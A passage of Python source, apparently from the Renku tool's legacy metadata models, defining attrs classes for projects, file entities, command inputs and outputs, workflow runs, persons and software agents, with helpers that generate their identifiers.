default=\"pre-0.11.0\")\n\n template_source = attr.ib(type=str, default=None)\n\n template_ref = attr.ib(type=str, default=None)\n\n template_id = attr.ib(type=str, default=None)\n\n template_version = attr.ib(type=str, default=None)\n\n template_metadata = attr.ib(type=str, default=\"{}\")\n\n immutable_template_files = attr.ib(factory=list)\n\n automated_update = attr.ib(converter=bool, default=True)\n\n creator = attr.ib(default=None, kw_only=True)\n\n _id = attr.ib(kw_only=True, default=None)\n\n _metadata_path = attr.ib(default=None, init=False)\n\n @created.default\n def _now(self):\n \"\"\"Define default value for datetime fields.\"\"\"\n return datetime.datetime.now(datetime.timezone.utc)\n\n def __attrs_post_init__(self):\n \"\"\"Initialize computed attributes.\"\"\"\n if not self.creator:\n old_metadata_path = project_context.metadata_path.joinpath(OLD_METADATA_PATH)\n repository = project_context.repository\n if old_metadata_path.exists():\n self.creator = Person.from_commit(repository.get_previous_commit(old_metadata_path, first=True))\n else:\n # this assumes the project is being newly created\n self.creator = Person.from_repository(repository)\n\n try:\n self._id = self.project_id\n except ValueError:\n \"\"\"Fallback to old behaviour.\"\"\"\n if not self._id:\n try:\n self._id = 
project_context.project.id\n except ValueError:\n metadata_path = project_context.metadata_path.joinpath(OLD_METADATA_PATH)\n self._id = Project.from_yaml(metadata_path)._id\n except errors.ConfigurationError:\n pass\n if not self._id:\n raise\n\n @property\n def project_id(self):\n \"\"\"Return the id for the project.\"\"\"\n return generate_project_id(name=self.name, creator=self.creator)\n\n @classmethod\n def from_yaml(cls, path):\n \"\"\"Return an instance from a YAML file.\"\"\"\n data = yaml.read_yaml(path)\n self = cls.from_jsonld(data=data)\n self._metadata_path = path\n\n return self\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return ProjectSchema().load(data)\n\n def to_yaml(self, path=None):\n \"\"\"Write an instance to the referenced YAML file.\"\"\"\n from renku import __version__\n\n self.agent_version = __version__\n\n self._metadata_path = path or self._metadata_path\n data = ProjectSchema().dump(self)\n yaml.write_yaml(path=self._metadata_path, data=data)\n\n\n@attr.s(eq=False, order=False)\nclass CommitMixin:\n \"\"\"Represent a commit mixin.\"\"\"\n\n commit = attr.ib(default=None, kw_only=True)\n path = attr.ib(default=None, kw_only=True, converter=_str_or_none)\n\n _id = attr.ib(default=None, kw_only=True)\n _label = attr.ib(kw_only=True)\n _project = attr.ib(type=Project, kw_only=True, default=None)\n\n def default_id(self):\n \"\"\"Configure calculated ID.\"\"\"\n hexsha = self.commit.hexsha if self.commit else \"UNCOMMITTED\"\n return generate_file_id(hexsha=hexsha, path=self.path)\n\n @_label.default\n def default_label(self):\n \"\"\"Generate a default label.\"\"\"\n if self.commit:\n hexsha = self.commit.hexsha\n else:\n hexsha = \"UNCOMMITTED\"\n if self.path:\n path = self.path\n if project_context.has_context() and os.path.isabs(path):\n path = Path(path).relative_to(project_context.path)\n return generate_label(path, hexsha)\n return hexsha\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n if self.path and project_context.has_context():\n path = Path(self.path)\n if path.is_absolute():\n self.path = str(path.relative_to(project_context.path))\n\n # always force \"project\" to be the current project\n if project_context.has_context():\n try:\n self._project = project_context.project\n except ValueError:\n metadata_path = project_context.metadata_path.joinpath(OLD_METADATA_PATH)\n self._project = Project.from_yaml(metadata_path)\n\n if not self._id:\n self._id = self.default_id()\n\n\n@attr.s(eq=False, order=False)\nclass Entity(CommitMixin):\n \"\"\"Represent a data value or item.\"\"\"\n\n _parent = attr.ib(\n default=None, kw_only=True, converter=lambda value: weakref.ref(value) if value is not None else None\n )\n\n checksum = attr.ib(default=None, kw_only=True, type=str)\n\n @classmethod\n def from_revision(cls, path, revision: Union[str, Commit] = \"HEAD\", parent=None, find_previous=True, **kwargs):\n \"\"\"Return dependency from given path and revision.\"\"\"\n repository = project_context.repository\n\n if find_previous:\n revision = repository.get_previous_commit(path, revision=revision)\n elif revision == \"HEAD\":\n revision = repository.head.commit\n else:\n assert isinstance(revision, Commit)\n\n _, commit, path = get_in_submodules(project_context.repository, revision, path)\n\n path_ = project_context.path / path\n if path != \".\" and path_.is_dir():\n entity = 
Collection(commit=commit, path=path, members=[], parent=parent)\n\n files_in_commit = [c.b_path for c in commit.get_changes() if not c.deleted]\n\n # update members with commits\n for member in path_.iterdir():\n if member.name == \".gitkeep\":\n continue\n\n member_path = str(member.relative_to(project_context.path))\n find_previous = True\n\n if member_path in files_in_commit:\n # we already know the newest commit, no need to look it up\n find_previous = False\n\n try:\n assert all(member_path != m.path for m in entity.members)\n\n entity.members.append(\n cls.from_revision(\n path=member_path,\n revision=commit,\n parent=entity,\n find_previous=find_previous,\n **kwargs,\n )\n )\n except errors.GitCommitNotFoundError:\n pass\n\n else:\n entity = cls(commit=commit, path=str(path), parent=parent, **kwargs)\n\n return entity\n\n @property\n def parent(self): # pragma: no cover\n \"\"\"Return the parent object.\"\"\"\n return self._parent() if self._parent is not None else None\n\n @property\n def entities(self):\n \"\"\"Yield itself.\"\"\"\n if project_context.has_context() and not self.commit and self._label and \"@UNCOMMITTED\" not in self._label:\n repository = project_context.repository\n self.commit = repository.get_commit(self._label.rsplit(\"@\", maxsplit=1)[-1])\n\n yield self\n\n\n@attr.s(eq=False, order=False)\nclass Collection(Entity):\n \"\"\"Represent a directory with files.\"\"\"\n\n members = attr.ib(kw_only=True, default=None)\n\n def __attrs_post_init__(self):\n \"\"\"Init members.\"\"\"\n super().__attrs_post_init__()\n\n if self.members is None:\n self.members = self.default_members()\n\n for member in self.members:\n member._parent = weakref.ref(self)\n\n def default_members(self):\n \"\"\"Generate default members as entities from current path.\"\"\"\n if not project_context.has_context():\n return []\n dir_path = project_context.path / self.path\n\n if not dir_path.exists():\n # likely a directory deleted in a previous commit\n return []\n\n assert dir_path.is_dir()\n\n members = []\n for path in dir_path.iterdir():\n if path.name == \".gitkeep\":\n continue # ignore empty directories in Git repository\n cls: Type = Collection if path.is_dir() else Entity\n members.append(cls(commit=self.commit, path=str(path.relative_to(project_context.path)), parent=self))\n return members\n\n @property\n def entities(self):\n \"\"\"Recursively return all files.\"\"\"\n for member in self.members:\n yield from member.entities\n\n if project_context.has_context() and not self.commit and self._label and \"@UNCOMMITTED\" not in self._label:\n repository = project_context.repository\n self.commit = repository.get_commit(self._label.rsplit(\"@\", maxsplit=1)[-1])\n\n yield self\n\n\n@attr.s(eq=False, order=False)\nclass MappedIOStream:\n \"\"\"Represents an IO stream (``stdin``, ``stdout``, ``stderr``).\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n _label = attr.ib(default=None, kw_only=True)\n\n STREAMS = [\"stdin\", \"stdout\", \"stderr\"]\n\n stream_type = attr.ib(type=str, kw_only=True)\n\n def default_id(self):\n \"\"\"Generate an id for a mapped stream.\"\"\"\n host = \"localhost\"\n if project_context.has_context():\n host = project_context.remote.host or host\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n\n return urljoin(f\"https://{host}\", posixpath.join(\"/iostreams\", self.stream_type))\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n return f'Stream mapping for stream \"{self.stream_type}\"'\n\n def __attrs_post_init__(self):\n \"\"\"Post-init 
hook.\"\"\"\n if not self._id:\n self._id = self.default_id()\n if not self._label:\n self._label = self.default_label()\n\n\n@attr.s(eq=False, order=False)\nclass CommandParameter:\n \"\"\"Represents a parameter for an execution template.\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n _label = attr.ib(default=None, kw_only=True)\n\n default_value = attr.ib(default=None, kw_only=True)\n\n description = attr.ib(default=None, kw_only=True)\n\n name: str = attr.ib(default=None, kw_only=True)\n\n position = attr.ib(default=None, type=int, kw_only=True)\n\n prefix = attr.ib(default=None, type=str, kw_only=True)\n\n @property\n def sanitized_id(self):\n \"\"\"Return ``_id`` sanitized for use in non-jsonld contexts.\"\"\"\n if \"/steps/\" in self._id:\n return \"/\".join(self._id.split(\"/\")[-4:])\n return \"/\".join(self._id.split(\"/\")[-2:])\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n raise NotImplementedError\n\n def default_name(self):\n \"\"\"Create a default name.\"\"\"\n raise NotImplementedError\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n if not self._label:\n self._label = self.default_label()\n if not self.name:\n self.name = self.default_name()\n\n\ndef _generate_name(base, prefix, position):\n name = get_slug(prefix.strip(\" -=\")) if prefix else base\n position = position or uuid.uuid4().hex[:RANDOM_ID_LENGTH]\n return f\"{name}-{position}\"\n\n\n@attr.s(eq=False, order=False)\nclass CommandArgument(CommandParameter):\n \"\"\"An argument to a command that is neither input nor output.\"\"\"\n\n value = attr.ib(default=None, type=str, kw_only=True)\n\n @staticmethod\n def generate_id(run_id, position=None):\n \"\"\"Generate an id for an argument.\"\"\"\n if position:\n id_ = str(position)\n else:\n id_ = uuid.uuid4().hex\n return f\"{run_id}/arguments/{id_}\"\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n return f'Command Argument \"{self.default_value}\"'\n\n def default_name(self):\n \"\"\"Create a default name.\"\"\"\n return _generate_name(base=\"param\", prefix=self.prefix, position=self.position)\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n super().__attrs_post_init__()\n\n if not self.default_value:\n self.default_value = self.value\n\n\n@attr.s(eq=False, order=False)\nclass CommandInput(CommandParameter):\n \"\"\"An input to a command.\"\"\"\n\n consumes = attr.ib(kw_only=True)\n\n mapped_to = attr.ib(default=None, kw_only=True)\n\n @staticmethod\n def generate_id(run_id, position=None):\n \"\"\"Generate an id for an argument.\"\"\"\n if position:\n id_ = str(position)\n else:\n id_ = uuid.uuid4().hex\n return f\"{run_id}/inputs/{id_}\"\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n return f'Command Input \"{self.default_value}\"'\n\n def default_name(self):\n \"\"\"Create a default name.\"\"\"\n return _generate_name(base=\"input\", prefix=self.prefix, position=self.position)\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n super().__attrs_post_init__()\n\n if not self.default_value:\n self.default_value = self.consumes.path\n\n\n@attr.s(eq=False, order=False)\nclass CommandOutput(CommandParameter):\n \"\"\"An output of a command.\"\"\"\n\n create_folder = attr.ib(default=False, kw_only=True, type=bool)\n\n produces = attr.ib(kw_only=True)\n\n mapped_to = attr.ib(default=None, kw_only=True)\n\n @staticmethod\n def generate_id(run_id, position=None):\n \"\"\"Generate an id for an argument.\"\"\"\n if position:\n id_ = str(position)\n else:\n id_ = 
uuid.uuid4().hex\n return f\"{run_id}/outputs/{id_}\"\n\n def default_label(self):\n \"\"\"Set default label.\"\"\"\n return f'Command Output \"{self.default_value}\"'\n\n def default_name(self):\n \"\"\"Create a default name.\"\"\"\n return _generate_name(base=\"output\", prefix=self.prefix, position=self.position)\n\n def __attrs_post_init__(self):\n \"\"\"Post-init hook.\"\"\"\n super().__attrs_post_init__()\n\n if not self.default_value:\n self.default_value = self.produces.path\n\n\n@attr.s(eq=False, order=False)\nclass RunParameter:\n \"\"\"A run parameter that is set inside the script.\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n\n _label = attr.ib(default=None, kw_only=True)\n\n name = attr.ib(default=None, type=str, kw_only=True)\n\n value = attr.ib(default=None, type=str, kw_only=True)\n\n type = attr.ib(default=None, type=str, kw_only=True)\n\n\n@total_ordering\n@attr.s(eq=False, order=False)\nclass Run(CommitMixin):\n \"\"\"Represents a `renku run` execution template.\"\"\"\n\n command = attr.ib(default=None, type=str, kw_only=True)\n\n successcodes = attr.ib(kw_only=True, type=list, factory=list)\n\n subprocesses = attr.ib(kw_only=True, factory=list)\n\n arguments = attr.ib(kw_only=True, factory=list)\n\n inputs = attr.ib(kw_only=True, factory=list)\n\n outputs = attr.ib(kw_only=True, factory=list)\n\n run_parameters = attr.ib(kw_only=True, factory=list)\n\n name = attr.ib(default=None, kw_only=True, type=str)\n\n description = attr.ib(default=None, kw_only=True, type=str)\n\n keywords = attr.ib(kw_only=True, factory=list)\n\n _activity = attr.ib(kw_only=True, default=None)\n\n @staticmethod\n def generate_id(identifier=None):\n \"\"\"Generate an id for a run.\"\"\"\n host = \"localhost\"\n host = project_context.remote.host or host\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n\n if not identifier:\n identifier = str(uuid.uuid4())\n\n return urljoin(f\"https://{host}\", posixpath.join(\"/runs\", quote(identifier, safe=\"\")))\n\n def __lt__(self, other):\n \"\"\"Compares two subprocesses' order based on their dependencies.\"\"\"\n a_inputs = set()\n b_outputs = set()\n\n for i in other.inputs:\n entity = i.consumes\n for sub_entity in entity.entities:\n a_inputs.add(sub_entity.path)\n\n for i in self.outputs:\n entity = i.produces\n for sub_entity in entity.entities:\n b_outputs.add(sub_entity.path)\n\n return a_inputs & b_outputs\n\n def add_subprocess(self, subprocess):\n \"\"\"Adds a subprocess to this run.\"\"\"\n process_order = 0\n if self.subprocesses:\n processes = [o.process for o in self.subprocesses]\n # Get position to insert based on dependencies\n process_order = bisect(processes, subprocess)\n if process_order < len(processes):\n # adjust ids of inputs inherited from later subprocesses\n for i in range(len(processes), process_order, -1):\n sp = self.subprocesses[i - 1]\n sp._id = sp._id.replace(f\"subprocess/{i}\", f\"subprocess/{i+1}\")\n sp.index += 1\n\n for inp in self.inputs:\n inp._id = inp._id.replace(f\"/steps/step_{i}/\", f\"/steps/step_{i+1}/\")\n for outp in self.outputs:\n outp._id = outp._id.replace(f\"/steps/step_{i}/\", f\"/steps/step_{i+1}/\")\n\n input_paths = [i.consumes.path for i in self.inputs]\n output_paths = [o.produces.path for o in self.outputs]\n\n for input_ in subprocess.inputs:\n if input_.consumes.path not in input_paths and input_.consumes.path not in output_paths:\n new_input = copy(input_)\n\n new_input._id = f\"{self._id}/steps/step_{process_order + 1}/\" f\"{new_input.sanitized_id}\"\n new_input.mapped_to 
= None\n\n matching_output = next((o for o in self.outputs if o.produces.path == new_input.consumes.path), None)\n\n if not matching_output:\n self.inputs.append(new_input)\n input_paths.append(new_input.consumes.path)\n\n for output in subprocess.outputs:\n if output.produces.path not in output_paths:\n new_output = copy(output)\n\n new_output._id = f\"{self._id}/steps/step_{process_order + 1}/\" f\"{new_output.sanitized_id}\"\n new_output.mapped_to = None\n self.outputs.append(new_output)\n output_paths.append(new_output.produces.path)\n\n matching_input = next((i for i in self.inputs if i.consumes.path == new_output.produces.path), None)\n if matching_input:\n self.inputs.remove(matching_input)\n input_paths.remove(matching_input.consumes.path)\n ordered_process = OrderedSubprocess(\n id=OrderedSubprocess.generate_id(self._id, process_order + 1), index=process_order + 1, process=subprocess\n )\n self.subprocesses.insert(process_order, ordered_process)\n\n\n@total_ordering\n@attr.s(eq=False, order=False)\nclass OrderedSubprocess:\n \"\"\"A subprocess with ordering.\"\"\"\n\n _id = attr.ib(kw_only=True)\n\n index = attr.ib(kw_only=True, type=int)\n\n process = attr.ib(kw_only=True)\n\n @staticmethod\n def generate_id(parent_id, index):\n \"\"\"Generate an id for an ``OrderedSubprocess``.\"\"\"\n return f\"{parent_id}/subprocess/{index}\"\n\n def __lt__(self, other):\n \"\"\"Compares two ordered subprocesses.\"\"\"\n return self.index < other.index\n\n\n@attr.s\nclass Association:\n \"\"\"Assign responsibility to an agent for an activity.\"\"\"\n\n plan = attr.ib()\n agent = attr.ib(default=None)\n\n _id = attr.ib(kw_only=True)\n\n\nclass EntityProxyMixin:\n \"\"\"Implement proxy to entity attribute.\"\"\"\n\n def __getattribute__(self, name):\n \"\"\"Proxy entity attributes.\"\"\"\n cls = object.__getattribute__(self, \"__class__\")\n names = {field.name for field in attr.fields(cls)}\n names |= set(dir(cls))\n if name in names:\n return object.__getattribute__(self, name)\n entity = object.__getattribute__(self, \"entity\")\n return getattr(entity, name)\n\n\n@attr.s(eq=False, order=False)\nclass Usage(EntityProxyMixin):\n \"\"\"Represent a dependent path.\"\"\"\n\n entity = attr.ib(kw_only=True)\n role = attr.ib(default=None, kw_only=True)\n\n _id = attr.ib(default=None, kw_only=True)\n\n\n@attr.s(eq=False, order=False)\nclass Generation(EntityProxyMixin):\n \"\"\"Represent an act of generating a file.\"\"\"\n\n entity = attr.ib()\n\n role = attr.ib(default=None)\n\n _activity = attr.ib(\n default=None, kw_only=True, converter=lambda value: weakref.ref(value) if value is not None else None\n )\n _id = attr.ib(kw_only=True)\n\n @property\n def activity(self):\n \"\"\"Return the activity object.\"\"\"\n return self._activity() if self._activity is not None else None\n\n @_id.default\n def default_id(self):\n \"\"\"Configure calculated ID.\"\"\"\n if self.role:\n return f\"{self.activity._id}/{self.role}\"\n return f\"{self.activity._id}/tree/{quote(str(self.entity.path))}\"\n\n\n@attr.s(eq=False, order=False)\nclass Activity(CommitMixin):\n \"\"\"Represent an activity in the repository.\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n _message = attr.ib(kw_only=True)\n _was_informed_by = attr.ib(kw_only=True)\n\n part_of = attr.ib(default=None, kw_only=True)\n\n _collections = attr.ib(default=attr.Factory(OrderedDict), init=False, kw_only=True)\n generated = attr.ib(kw_only=True, default=None)\n\n invalidated = attr.ib(kw_only=True, default=None)\n\n influenced = 
attr.ib(kw_only=True)\n\n started_at_time = attr.ib(kw_only=True)\n\n ended_at_time = attr.ib(kw_only=True)\n\n agents = attr.ib(kw_only=True)\n\n _metadata_path = attr.ib(default=None, init=False)\n\n @classmethod\n def from_yaml(cls, path, commit=None):\n \"\"\"Return an instance from a YAML file.\"\"\"\n data = yaml.read_yaml(path)\n\n self = cls.from_jsonld(data=data, commit=commit)\n self._metadata_path = path\n\n return self\n\n @classmethod\n def from_jsonld(cls, data, commit=None):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, list):\n raise ValueError(data)\n\n schema = ActivitySchema\n\n if any(str(wfprov.WorkflowRun) in d[\"@type\"] for d in data):\n schema = WorkflowRunSchema\n elif any(str(wfprov.ProcessRun) in d[\"@type\"] for d in data):\n schema = ProcessRunSchema\n\n return schema(commit=commit, flattened=True).load(data)\n\n @_message.default\n def default_message(self):\n \"\"\"Generate a default message.\"\"\"\n if self.commit:\n return self.commit.message\n\n @_was_informed_by.default\n def default_was_informed_by(self):\n \"\"\"List parent actions.\"\"\"\n if self.commit:\n return [self.generate_id(parent) for parent in self.commit.parents]\n\n @started_at_time.default\n def default_started_at_time(self):\n \"\"\"Configure calculated properties.\"\"\"\n if self.commit:\n return self.commit.authored_datetime\n\n @ended_at_time.default\n def default_ended_at_time(self):\n \"\"\"Configure calculated properties.\"\"\"\n if self.commit:\n return self.commit.committed_datetime\n\n @agents.default\n def default_agents(self):\n \"\"\"Set person agent to be the author of the commit.\"\"\"\n renku_agent = SoftwareAgent(label=f\"renku {__version__}\", id=version_url)\n if self.commit:\n return [Person.from_commit(self.commit), renku_agent]\n return [renku_agent]\n\n @influenced.default\n def default_influenced(self):\n \"\"\"Calculate default values.\"\"\"\n return list(self._collections.values())\n\n\n@attr.s(eq=False, order=False)\nclass ProcessRun(Activity):\n \"\"\"A process run is a particular execution of a Process description.\"\"\"\n\n __association_cls__ = Run\n\n generated = attr.ib(kw_only=True, default=None)\n\n association = attr.ib(default=None, kw_only=True)\n\n annotations = attr.ib(kw_only=True, default=None)\n\n qualified_usage = attr.ib(kw_only=True, default=None)\n\n run_parameter = attr.ib(kw_only=True, default=None)\n\n def __attrs_post_init__(self):\n \"\"\"Calculate properties.\"\"\"\n super().__attrs_post_init__()\n repository = project_context.repository\n commit_not_set = not self.commit or self.commit.hexsha in self._id\n if commit_not_set and Path(self.path).exists():\n self.commit = repository.get_previous_commit(self.path)\n\n if self.association:\n self.association.plan._activity = weakref.ref(self)\n plan = self.association.plan\n if not plan.commit:\n if self.commit:\n plan.commit = self.commit\n\n if plan.inputs:\n for i in plan.inputs:\n _set_entity_commit(entity=i.consumes, commit=self.commit)\n if plan.outputs:\n for o in plan.outputs:\n _set_entity_commit(entity=o.produces, commit=self.commit)\n\n if self.qualified_usage and self.commit:\n usages = []\n revision = self.commit.hexsha\n for usage in self.qualified_usage:\n if not usage.commit and \"@UNCOMMITTED\" in usage._label:\n usages.append(\n Usage.from_revision(path=usage.path, role=usage.role, revision=revision, id=usage._id)\n )\n else:\n if not usage.commit:\n revision = usage._label.rsplit(\"@\", 
maxsplit=1)[-1]\n usage.entity.commit = repository.get_commit(revision)\n\n usages.append(usage)\n self.qualified_usage = usages\n\n @classmethod\n def generate_id(cls, commit_hexsha):\n \"\"\"Calculate action ID.\"\"\"\n host = \"localhost\"\n host = project_context.remote.host or host\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n\n return urljoin(\n f\"https://{host}\",\n posixpath.join(\"/activities\", f\"commit/{commit_hexsha}\"),\n )\n\n @classmethod\n def from_run(cls, run, path, commit=None, subprocess_index=None, update_commits=False):\n \"\"\"Convert a ``Run`` to a ``ProcessRun``.\"\"\"\n repository = project_context.repository\n\n if not commit:\n commit = repository.head.commit\n\n usages = []\n\n id_ = ProcessRun.generate_id(commit.hexsha)\n\n if subprocess_index is not None:\n id_ = f\"{id_}/steps/step_{subprocess_index}\"\n\n for input_ in run.inputs:\n usage_id = f\"{id_}/{input_.sanitized_id}\"\n input_path = input_.consumes.path\n entity = input_.consumes\n if update_commits:\n commit = repository.get_previous_commit(input_path, revision=commit.hexsha)\n entity = Entity.from_revision(input_path, commit)\n\n dependency = Usage(entity=entity, role=input_.sanitized_id, id=usage_id)\n\n usages.append(dependency)\n\n agent = SoftwareAgent.from_commit(commit)\n association = Association(agent=agent, id=id_ + \"/association\", plan=run)\n\n run_parameter = []\n\n for parameter in run.run_parameters:\n parameter_id = f\"{id_}/{parameter.name}\"\n run_parameter.append(RunParameter(name=parameter.name, value=parameter.value, id=parameter_id))\n\n process_run = cls(\n id=id_,\n qualified_usage=usages,\n association=association,\n commit=commit,\n path=path,\n run_parameter=run_parameter,\n )\n\n generated = []\n\n for output in run.outputs:\n entity = Entity.from_revision(output.produces.path, revision=commit, parent=output.produces.parent)\n\n generation = Generation(activity=process_run, role=output.sanitized_id, entity=entity)\n generated.append(generation)\n\n process_run.generated = generated\n\n return process_run\n\n def to_yaml(self, path=None):\n \"\"\"Write an instance to the referenced YAML file.\"\"\"\n self._metadata_path = path or self._metadata_path\n data = ProcessRunSchema(flattened=True).dump(self)\n yaml.write_yaml(path=self._metadata_path, data=data)\n\n\n@attr.s(eq=False, order=False)\nclass WorkflowRun(ProcessRun):\n \"\"\"A workflow run typically contains several subprocesses.\"\"\"\n\n __association_cls__ = Run\n\n _processes = attr.ib(kw_only=True, default=attr.Factory(list))\n\n @property\n def subprocesses(self):\n \"\"\"Subprocesses of this ``WorkflowRun``.\"\"\"\n return {i: p for i, p in enumerate(self._processes)}\n\n\n@attr.s\nclass Url:\n \"\"\"Represents a schema URL reference.\"\"\"\n\n url = attr.ib(default=None, kw_only=True)\n\n url_str = attr.ib(default=None, kw_only=True)\n url_id = attr.ib(default=None, kw_only=True)\n\n _id = attr.ib(default=None, kw_only=True)\n\n def default_id(self):\n \"\"\"Define default value for id field.\"\"\"\n return generate_url_id(url_str=self.url_str, url_id=self.url_id)\n\n def default_url(self):\n \"\"\"Define default value for url field.\"\"\"\n if self.url_str:\n return self.url_str\n elif self.url_id:\n return {\"@id\": self.url_id}\n else:\n raise NotImplementedError(\"Either url_id or url_str has to be set\")\n\n @property\n def value(self):\n \"\"\"Returns the url value as string.\"\"\"\n if self.url_str:\n return self.url_str\n elif self.url_id:\n return self.url_id\n else:\n raise 
NotImplementedError(\"Either url_id or url_str has to be set\")\n\n def __attrs_post_init__(self):\n \"\"\"Post-initialize attributes.\"\"\"\n if not self.url:\n self.url = self.default_url()\n elif isinstance(self.url, dict):\n if \"_id\" in self.url:\n self.url[\"@id\"] = self.url.pop(\"_id\")\n self.url_id = self.url[\"@id\"]\n elif isinstance(self.url, str):\n self.url_str = self.url\n\n if not self._id or self._id.startswith(\"_:\"):\n self._id = self.default_id()\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldUrlSchema().load(data)\n\n def as_jsonld(self):\n \"\"\"Create JSON-LD.\"\"\"\n return OldUrlSchema().dump(self)\n\n\ndef _convert_creators(value):\n \"\"\"Convert creators.\"\"\"\n if isinstance(value, dict): # compatibility with previous versions\n return [Person.from_jsonld(value)]\n\n if isinstance(value, list):\n return [Person.from_jsonld(v) for v in value]\n\n return value\n\n\nclass Person:\n \"\"\"Represent a person.\"\"\"\n\n __slots__ = (\"affiliation\", \"alternate_name\", \"email\", \"id\", \"label\", \"name\")\n\n def __init__(\n self,\n *,\n affiliation: str = None,\n alternate_name: str = None,\n email: str = None,\n id: str = None,\n label: str = None,\n name: str,\n ):\n self.validate_email(email)\n\n if id == \"mailto:None\" or not id or id.startswith(\"_:\"):\n full_identity = Person.get_full_identity(email, affiliation, name)\n id = Person.generate_id(email, full_identity, hostname=get_host(use_project_context=False))\n label = label or name\n\n self.affiliation: str = affiliation\n self.alternate_name: str = alternate_name\n self.email: str = email\n self.id: str = id\n self.label: str = label\n self.name: str = name\n\n def __eq__(self, other):\n if self is other:\n return True\n if not isinstance(other, Person):\n return False\n return self.id == other.id and self.full_identity == other.full_identity\n\n def __hash__(self):\n return hash((self.id, self.full_identity))\n\n @staticmethod\n def generate_id(email, full_identity, hostname):\n \"\"\"Generate identifier for Person.\"\"\"\n if email:\n return f\"mailto:{email}\"\n\n id = full_identity or str(uuid.uuid4().hex)\n id = quote(id, safe=\"\")\n\n # TODO: Remove hostname part once migrating to new metadata\n return f\"https://{hostname}/persons/{id}\"\n\n @staticmethod\n def validate_email(email):\n \"\"\"Check that the email is valid.\"\"\"\n if not email:\n return\n if not isinstance(email, str) or not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n raise ValueError(\"Email address is invalid.\")\n\n @classmethod\n def from_commit(cls, commit):\n \"\"\"Create an instance from a Git commit.\"\"\"\n return cls(name=commit.author.name, email=commit.author.email)\n\n @property\n def short_name(self):\n \"\"\"Gives full name in short form.\"\"\"\n names = self.name.split()\n if len(names) == 1:\n return self.name\n\n last_name = names[-1]\n initials = [name[0] for name in names]\n initials.pop()\n\n return \"{}.{}\".format(\".\".join(initials), last_name)\n\n @property\n def full_identity(self):\n \"\"\"Return name, email, and affiliation.\"\"\"\n return self.get_full_identity(self.email, self.affiliation, self.name)\n\n @staticmethod\n def get_full_identity(email, affiliation, name):\n \"\"\"Return name, email, and affiliation.\"\"\"\n email = f\" <{email}>\" if email else \"\"\n affiliation = f\" [{affiliation}]\" if affiliation else \"\"\n 
return f\"{name}{email}{affiliation}\"\n\n @classmethod\n def from_repository(cls, repository):\n \"\"\"Create an instance from a repository.\"\"\"\n user = repository.get_user()\n return cls(email=user.email, name=user.name)\n\n @classmethod\n def from_string(cls, string):\n \"\"\"Create an instance from a 'Name ' string.\"\"\"\n regex_pattern = r\"([^<>\\[\\]]*)\" r\"(?:<{1}\\s*(\\S+@\\S+\\.\\S+){0,1}\\s*>{1}){0,1}\\s*\" r\"(?:\\[{1}(.*)\\]{1}){0,1}\"\n name, email, affiliation = re.search(regex_pattern, string).groups()\n if name:\n name = name.strip()\n if affiliation:\n affiliation = affiliation.strip()\n affiliation = affiliation or None\n\n return cls(affiliation=affiliation, email=email, name=name)\n\n @classmethod\n def from_dict(cls, data):\n \"\"\"Create and instance from a dictionary.\"\"\"\n return cls(**data)\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldPersonSchema().load(data)\n\n\nclass SoftwareAgent:\n \"\"\"Represent executed software.\"\"\"\n\n __slots__ = (\"id\", \"label\")\n\n def __init__(self, *, id: str, label: str):\n self.id: str = id\n self.label: str = label\n\n def __eq__(self, other):\n if self is other:\n return True\n if not isinstance(other, SoftwareAgent):\n return False\n return self.id == other.id and self.label == other.label\n\n def __hash__(self):\n return hash((self.id, self.label))\n\n @classmethod\n def from_commit(cls, commit):\n \"\"\"Create an instance from a Git commit.\"\"\"\n # FIXME: This method can return a Person object but SoftwareAgent is not its super class\n author = Person.from_commit(commit)\n if commit.author != commit.committer:\n return cls(label=commit.committer.name, id=commit.committer.email)\n return author\n\n\n@attr.s\nclass CreatorMixin:\n \"\"\"Mixin for handling creators container.\"\"\"\n\n creators = attr.ib(kw_only=True, converter=_convert_creators)\n\n @property\n def creators_csv(self):\n \"\"\"Comma-separated list of creators associated with dataset.\"\"\"\n return \", \".join(creator.name for creator in self.creators)\n\n @property\n def creators_full_csv(self):\n \"\"\"Comma-separated list of creators with full identity.\"\"\"\n return \", \".join(creator.full_identity for creator in self.creators)\n\n\ndef _extract_doi(value):\n \"\"\"Return either a string or the doi part of a URL.\"\"\"\n value = str(value)\n if is_doi(value):\n return extract_doi(value)\n return value\n\n\n@attr.s(slots=True)\nclass DatasetTag:\n \"\"\"Represents a Tag of an instance of a dataset.\"\"\"\n\n name = attr.ib(default=None, kw_only=True, validator=instance_of(str))\n\n description = attr.ib(default=None, kw_only=True, validator=instance_of(str))\n\n commit = attr.ib(default=None, kw_only=True, validator=instance_of(str))\n\n created = attr.ib(converter=parse_date, kw_only=True)\n\n dataset = attr.ib(default=None, kw_only=True)\n\n _id = attr.ib(default=None, kw_only=True)\n\n @created.default\n def _now(self):\n \"\"\"Define default value for datetime fields.\"\"\"\n return datetime.datetime.now(datetime.timezone.utc)\n\n def default_id(self):\n \"\"\"Define default value for id 